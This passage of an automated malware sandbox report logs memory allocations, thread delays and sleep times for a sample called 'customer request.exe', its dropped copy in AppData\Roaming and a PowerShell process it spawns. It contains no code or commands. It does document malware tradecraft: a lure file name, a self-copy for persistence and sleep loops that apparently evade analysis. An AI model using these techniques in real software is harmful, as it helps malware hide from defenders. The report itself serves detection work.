            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: B7B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: BDB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: CDB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: DDB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 3140000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 3370000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 5370000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 90E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: A0E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: A2D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: B2D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: B8F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: C8F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 2A90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 2CB0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeMemory allocated: 2C00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599545Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599320Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598886Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598779Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598222Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597451Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595915Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595702Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595583Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595458Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 594140Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599890
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599780
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599671
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599562
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599453
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599343
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599234
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599123
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 599000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598887
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598778
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598446
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598334
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598203
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 598077
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597968
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597859
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597749
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597640
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597531
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597421
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597312
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597202
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 597091
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596968
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596859
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596749
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596640
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596531
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596421
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596312
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596203
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 596093
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595984
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595874
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595752
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595126
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 595000
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594890
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594781
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594671
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594562
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594452
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594343
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594234
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594125
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 594015
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 593901
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeThread delayed: delay time: 593780
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7728Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1267Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8179Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeWindow / User API: threadDelayed 6312Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeWindow / User API: threadDelayed 3533Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeWindow / User API: threadDelayed 2473
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeWindow / User API: threadDelayed 7384
            Source: C:\Users\user\Desktop\customer request.exe TID: 6892Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep count: 8179 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep count: 1365 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7388Thread sleep count: 6312 > 30Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7388Thread sleep count: 3533 > 30Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599545s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599320s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599108s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598886s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598779s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598655s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598222s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597451s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596905s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595915s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595702s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595583s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595458s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\customer request.exe TID: 7384Thread sleep time: -594140s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7368Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep count: 33 > 30
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599890s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7616Thread sleep count: 2473 > 30
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7616Thread sleep count: 7384 > 30
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599780s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599671s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599562s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599453s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599343s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599234s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599123s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -599000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598887s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598778s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598446s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598334s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598203s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -598077s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597968s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597859s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597749s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597640s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597531s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597421s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597312s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597202s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -597091s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596968s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596859s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596749s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596640s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596531s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596421s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596312s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596203s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -596093s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -595874s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -595752s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -595126s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -595000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594890s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594781s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594671s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594562s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594452s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594343s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594234s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594125s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -594015s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -593901s >= -30000s
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe TID: 7612Thread sleep time: -593780s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599545Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599320Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598886Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598779Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598655Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598222Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597451Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeThread delayed: delay time: 596468Jump to behavior
